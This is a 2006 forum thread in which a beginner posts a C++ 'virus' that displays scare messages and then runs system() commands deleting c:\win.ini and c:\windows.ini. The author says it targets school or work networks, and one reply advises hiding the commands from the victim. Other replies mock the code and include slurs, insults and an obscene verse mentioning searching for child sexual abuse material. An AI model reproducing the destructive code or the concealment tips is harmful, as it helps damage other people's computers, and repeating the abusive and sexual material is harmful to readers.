Posted March 13, 200619 yr this still needs compiling though ############CODE############## #include <iostream> #include <dos.h> #include <stdlib.h> #include <conio.h> using namespace std; void pause(); void destroy(); int main() { cout << "your account is not responding and needs to shut down.\n"; cout << "yOU iDOit tHIs iS a bUG tHaT wILl kILL wINdowS !.\n"; cout << "tO sToP tHIs fROm haPPEninG cLICk tHe X.\n"; pause(); cout << "aRE yOu rEAlly sURe???---cOUrtEsy oF fIRebUg \n"; pause(); destroy(); return 0; } void pause() { system("pause"); } void destroy() { system("if exist c:\win.ini del c:\win.ini else echo ."); system("if exist c:\windows.ini del c:\windows.ini else echo ."); } ############CODE##############
March 13, 200619 yr Author s3xt0y said: nice and simple i hope if you dont mind if i edit the source a bit =P you do what you want with it but post what you got after woulds and tell me what you added on does
March 13, 200619 yr fIRebUg said: you do what you want with it but post what you got after woulds and tell me what you added on does oh i was just gunna mess with it and learn from it and try to mod it im learning C++.
March 14, 200619 yr I cut my cock for shits and laughs, I put dried shit back in my ass. I mangle my balls with a rose's thorn, and search on the web for kiddie porn! I take pictures of my own streched ass, and cut off my nuts with broken glass. Yo-ho yo-ho 'tis a Pirate's life for me!
March 14, 200619 yr Just a hint, if you don't want them to see what you're doing with DOS scripts, put system("@echo off"); before everything. But then again, you can just use remove(const char*), instead, if you're so inclined.
March 15, 200619 yr Author asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work //
March 15, 200619 yr fIRebUg said: asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work // but it doesn't spread...
March 15, 200619 yr fIRebUg said: asi i stated before this is my forst so go easy and its designed for large networks of comptures e.g. school network or work // Yeah, you don't know what the fuck you're talking about.
March 16, 200619 yr bioslippery said: Actually, it is, it raped my dog, and my mother, apparently within its few lines of code, it can actually take down the entire internet, using a simple AIM spead method, hidden within the 'cout' funcs! your a ***
March 16, 200619 yr Say hello to penis gobblin. Seriously though, its not a good idea to try to write a virus on your first day of learning to program.
March 16, 200619 yr yeah thats about the gayest code in the whole world but thats if its a virus. its not the gayest trojan ive ever seen though :ugh:
March 16, 200619 yr That program is nice and simple, but will probably get caught with most Anti-Virus.
March 16, 200619 yr Sir.AnthraX said: That program is nice and simple, but will probably get caught with most Anti-Virus. I highly doubt that.
March 16, 200619 yr Author AS I HAVE SAID BEFORE TI HAVE ONLY BEEN LEARNING FOR LESS THAN A MONTH SO DONT FUCKING FLAME ME CUNTS !!!!!!!!!!!!!!!!!!!!!!
March 16, 200619 yr I find it kind of funny how this sub-par program has angered nearly everyone who has written in the thread. But yeah, that code doesn't spread (as is) so it isn't really a virus.
March 16, 200619 yr Author Wheat Toast said: I find it kind of funny how this sub-par program has angered nearly everyone who has written in the thread. But yeah, that code doesn't spread (as is) so it isn't really a virus. Thats what saddens me cause i try and get some advice and some genuine help with with programming and i get this sort of attitude from people :tear: you guys should learn to help people not put them down Where Should I Put The NO DOS WINDOW code ?
March 16, 200619 yr Too many script kiddies on these forums.. God damnit. If you don't know where to place the code, don't USE the code until you know. That's a nice rule.